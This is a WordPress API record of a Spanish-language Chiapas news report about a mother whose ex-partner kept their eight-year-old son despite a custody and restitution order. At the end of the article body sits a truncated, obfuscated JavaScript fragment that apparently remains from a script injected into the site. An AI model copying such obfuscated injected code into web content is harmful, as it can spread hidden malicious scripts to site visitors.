{"id":25744,"date":"2025-12-11T04:36:14","date_gmt":"2025-12-11T04:36:14","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25744"},"modified":"2025-12-11T04:36:15","modified_gmt":"2025-12-11T04:36:15","slug":"madre-denuncia-grave-omision-de-la-fge-lleva-meses-sin-ver-a-su-menor-hijo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25744","title":{"rendered":"Madre denuncia grave omisi\u00f3n de la FGE, lleva meses sin ver a su menor hijo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000485941-1024x768.jpg\" alt=\"\" class=\"wp-image-25745\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000485941-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000485941-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000485941-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000485941-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000485941-2048x1536.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><br>Manuel Jim\u00e9nez.<br>10 de diciembre del 2025. Tuxtla Guti\u00e9rrez.- Valeria Flores, madre de un ni\u00f1o de 8 a\u00f1os, denunci\u00f3 el calvario que vive desde abril, cuando su expareja se llev\u00f3 al menor con enga\u00f1os y no lo devolvi\u00f3.<br>La pesadilla comenz\u00f3 con una invitaci\u00f3n. El padre del ni\u00f1o pidi\u00f3 llevarlo a comer y despu\u00e9s, por primera vez, a dormir fuera de casa.<br>Valeria acept\u00f3 con la condici\u00f3n de mantenerse en contacto, pero la comunicaci\u00f3n se cort\u00f3. Al d\u00eda siguiente, al no encontrarlos, acudi\u00f3 a la Fiscal\u00eda de la Mujer. All\u00ed se enter\u00f3 de una cruel paradoja: su expareja ya la hab\u00eda denunciado falsamente por delitos graves, de los que luego fue exonerada. Ella, a su vez, interpuso una denuncia por violencia vicaria, que fue la que prosper\u00f3.<br>El 28 de septiembre, un Juzgado Penal vincul\u00f3 a proceso al padre por violencia familiar.<br>Sin embargo, no se dict\u00f3 prisi\u00f3n preventiva bajo el argumento de que su credencial de elector demostraba que &#8220;estaba localizable&#8221;.<br>El 4 de diciembre, tras una batalla legal, un Juzgado Familiar le otorg\u00f3 a Valeria la guardia y custodia y orden\u00f3 la restituci\u00f3n inmediata del menor para el 9 de diciembre.<br>Pero la orden no se cumpli\u00f3. &#8220;Al llegar al domicilio, no abre, no contestan&#8221;, relat\u00f3 Valeria. La diligencia se suspendi\u00f3. Desde entonces, sus solicitudes para que la autoridad ingrese al domicilio por la fuerza han sido respondidas con evasivas: &#8220;Me dicen que se van de vacaciones, que el tiempo, que no lo localizan&#8221;.<br>La situaci\u00f3n es cr\u00edtica. El menor, cuya localizaci\u00f3n era el fundamento para no privar de la libertad a su padre, lleva 15 d\u00edas sin asistir a la escuela, una prueba que Valeria ya present\u00f3 ante las autoridades.<br>Ella teme una fuga: &#8220;\u00c9l tiene familiares en otros lugares&#8221;. Adem\u00e1s, sugiri\u00f3 un posible tr\u00e1fico de influencias, al se\u00f1alar que el padre &#8220;tiene un t\u00edo por parte de su mam\u00e1 que trabaja en los tribunales&#8221;.<\/p>\n\n\n\n<p>Frustrada por la inacci\u00f3n, Valeria Flores dirigi\u00f3 un llamado urgente al gobernador Eduardo Ram\u00edrez Aguilar, a quien ya ha buscado en dos ocasiones. &#8220;Quisiera pedirle, por favor, que pusiera atenci\u00f3n en esto&#8221;, implor\u00f3. Critic\u00f3 que ha sido derivada a asesores que solo le dan &#8220;un papel para mantenerme entretenida&#8221;, sin soluciones.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez.10 de diciembre del 2025. Tuxtla Guti\u00e9rrez.- Valeria Flores, madre de un ni\u00f1o de 8 a\u00f1os, denunci\u00f3 el calvario que vive desde abril, cuando su expareja se llev\u00f3 al menor con enga\u00f1os y no lo devolvi\u00f3.La pesadilla comenz\u00f3 con una invitaci\u00f3n. El padre del ni\u00f1o pidi\u00f3 llevarlo a comer y despu\u00e9s, por primera vez, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25745,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-25744","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25744","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25744"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25744\/revisions"}],"predecessor-version":[{"id":25746,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25744\/revisions\/25746"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25745"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25744"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25744"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25744"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}